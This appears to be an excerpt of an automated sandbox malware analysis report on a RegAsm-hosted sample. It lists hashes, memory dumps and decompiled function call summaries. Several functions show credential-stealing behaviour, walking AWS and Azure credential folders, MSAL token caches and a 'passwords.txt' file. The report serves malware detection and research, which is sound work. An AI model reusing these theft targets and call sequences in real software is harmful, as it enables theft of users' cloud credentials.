                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$Filelstrcpy$H_prologlstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
                                                                                                                                                                                                • String ID: passwords.txt
                                                                                                                                                                                                • API String ID: 2199717062-347816968
                                                                                                                                                                                                • Opcode ID: 6e4a667533346ac0f5859deab80df632c1508782ce65bd4c710a45f3a3a326f6
                                                                                                                                                                                                • Instruction ID: 4cb9c01856663f2d3d296e6bf867e5005dd0c34532cecdf588301216e44e64e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e4a667533346ac0f5859deab80df632c1508782ce65bd4c710a45f3a3a326f6
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAA15972800129EFDB01EBA1DD4AEEE7F7AFF19304F10182AF511A21A1DB750A15DB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B575660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
                                                                                                                                                                                                • API String ID: 0-209218429
                                                                                                                                                                                                • Opcode ID: 682db500afecb686c8b0fb0c1c3258d1abf666f186ba9134499ddc06cda3183b
                                                                                                                                                                                                • Instruction ID: ae3fd1efd63f099223a886612802c4e3fb341daac595dfb5b8a26adb63c33cb1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 682db500afecb686c8b0fb0c1c3258d1abf666f186ba9134499ddc06cda3183b
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4F10A756003419FDB149F24E881B9BBBF8FF98318F44492DED8A87201D735E959CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BCC80 Relevance: 47.7, APIs: 15, Strings: 12, Instructions: 470COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
                                                                                                                                                                                                • API String ID: 0-1613945299
                                                                                                                                                                                                • Opcode ID: 5ce2280f04b2c4de571e5758652d51e44d99815295ff982505769a9ef2270e1c
                                                                                                                                                                                                • Instruction ID: c0718d8091d3d17c099cf539590a06cb9928f5fb099d8682cda0e2830a9270d5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ce2280f04b2c4de571e5758652d51e44d99815295ff982505769a9ef2270e1c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF106B1908344ABDB048F64DD41FEFB7EAAF89704F04CA1DF9C496241E639E9458B63
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B539120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                                                                                                                                                                • API String ID: 0-1242591684
                                                                                                                                                                                                • Opcode ID: dc9d89105961e2456e9e4d86def8b3d84e0400b89c319c1eb14f95a28f4cc2d5
                                                                                                                                                                                                • Instruction ID: 37c8096c43508955b700f2c38d5ed2a46673f1a7f38b82f86dc220e24d3262d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9d89105961e2456e9e4d86def8b3d84e0400b89c319c1eb14f95a28f4cc2d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: F4C1F2B5500301ABEB109F64DCC9B977BB8FF9431AF04452CED8A86321D736E959CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5EB050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                                                • API String ID: 0-900822179
                                                                                                                                                                                                • Opcode ID: 6e5ee7087c2f6be32a926b73e523c7a0a10f048773ef82efb8e513c441091237
                                                                                                                                                                                                • Instruction ID: bbd446b26550258dbeb8a021221716067557f7feb84151dff2dcb5a3d52eedb2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5ee7087c2f6be32a926b73e523c7a0a10f048773ef82efb8e513c441091237
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7991E6B19083059BEB04CF24C8C1BEBBBE5AF59705F54498DE895CB252D332E946C7B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AD820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                • API String ID: 0-449611708
                                                                                                                                                                                                • Opcode ID: f18d4ea07c2ab62da686cedbcecf2f1f2c3e4107567e280d7a4d1e950be6dcc6
                                                                                                                                                                                                • Instruction ID: 062053bfd1bfa9432cd9a8194b4f1d99e4795ccf72b734f7b02ce9e64bec9f00
                                                                                                                                                                                                • Opcode Fuzzy Hash: f18d4ea07c2ab62da686cedbcecf2f1f2c3e4107567e280d7a4d1e950be6dcc6
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB514CB0B0430167EB102F75ACC5FDB7AA86F74619F00813CFDDAA6341E768E519C2A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004157FD Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00415802
                                                                                                                                                                                                • memset.MSVCRT ref: 00415822
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00415848
                                                                                                                                                                                                • lstrcat.KERNEL32(?,\.azure\), ref: 00415865
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0041531B: _EH_prolog.MSVCRT ref: 00415320
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 00415340
                                                                                                                                                                                                  • Part of subcall function 0041531B: FindFirstFileA.KERNEL32(?,?), ref: 00415357
                                                                                                                                                                                                  • Part of subcall function 0041531B: StrCmpCA.SHLWAPI(?,00425854), ref: 00415374
                                                                                                                                                                                                  • Part of subcall function 0041531B: StrCmpCA.SHLWAPI(?,00425858), ref: 0041538E
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 004153B2
                                                                                                                                                                                                  • Part of subcall function 0041531B: StrCmpCA.SHLWAPI(?,004254BF), ref: 004153C3
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 004153E0
                                                                                                                                                                                                  • Part of subcall function 0041531B: PathMatchSpecA.SHLWAPI(?,?), ref: 00415407
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,?), ref: 00415433
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,00425870), ref: 00415445
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,?), ref: 00415455
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,00425874), ref: 00415467
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,?), ref: 0041547B
                                                                                                                                                                                                • memset.MSVCRT ref: 004158A0
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004158CB
                                                                                                                                                                                                • lstrcat.KERNEL32(?,\.aws\), ref: 004158E8
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 004153F4
                                                                                                                                                                                                • memset.MSVCRT ref: 00415923
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0041594E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0041596B
                                                                                                                                                                                                  • Part of subcall function 0041531B: FindNextFileA.KERNEL32(00000000,?), ref: 00415616
                                                                                                                                                                                                  • Part of subcall function 0041531B: FindClose.KERNEL32(00000000), ref: 00415625
                                                                                                                                                                                                • memset.MSVCRT ref: 004159A6
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                • API String ID: 2836893066-974132213
                                                                                                                                                                                                • Opcode ID: 5c309d8917c2dbb9d2bc30700055216cedeab1c1bd0d7ed21c405cdb9ab650f4
                                                                                                                                                                                                • Instruction ID: fa8c46e6e26b95153925fc6919cb1346faf9ea8fd1a5faa0a0639d946a624cc1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c309d8917c2dbb9d2bc30700055216cedeab1c1bd0d7ed21c405cdb9ab650f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 864192B1D4022CAADB01FBE1DC46EEE7B7CAF1C304F4005ABB555E3182DA7897588B65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B627FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                • API String ID: 0-2933911573
                                                                                                                                                                                                • Opcode ID: 2a9e9985cd58c95ebf71ee9be85ce1b12d139d8ed8efcf550e4549b455e46e8b
                                                                                                                                                                                                • Instruction ID: 7de1b07713f84838c6d6e8b92f751db237c78e219ef63f2fcd9b8ba6d1f3e3c6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a9e9985cd58c95ebf71ee9be85ce1b12d139d8ed8efcf550e4549b455e46e8b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94A1A1F59403025BE7004B34AC81BFA7B99DFA1225F8445A9FCC597182E52BE50FDBB1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B2BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1B4B2DA4
                                                                                                                                                                                                • misuse, xrefs: 1B4B2E73
                                                                                                                                                                                                • NULL, xrefs: 1B4B2E38
                                                                                                                                                                                                • invalid, xrefs: 1B4B2E4E
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4B2E5A
                                                                                                                                                                                                • unopened, xrefs: 1B4B2E55
                                                                                                                                                                                                • WHERE name=%Q, xrefs: 1B4B2DB7
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4B2E78
                                                                                                                                                                                                • ORDER BY name, xrefs: 1B4B2DCC
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4B2E69
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                • API String ID: 0-1179878930
                                                                                                                                                                                                • Opcode ID: cb310e55b8ef9d304e186b7d61ecd6bfe11e48fc232817e8c0e6bbb29c753da4
                                                                                                                                                                                                • Instruction ID: 8016e3151c8ca9c45308c78cadab350526264ee33489bc7269244061a795805b
                                                                                                                                                                                                • Opcode Fuzzy Hash: cb310e55b8ef9d304e186b7d61ecd6bfe11e48fc232817e8c0e6bbb29c753da4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 67C126B09043019BDB108F14CA45BDB7FA4AF54355F04C928EE959B342E339E98AC7B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004087A5 Relevance: 30.4, APIs: 20, Instructions: 407stringmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004087AA
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089FA
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00408A01
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00408B24
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DDC), ref: 00408B32
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00408B44
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DE0), ref: 00408B52
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00408C65
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00408C73
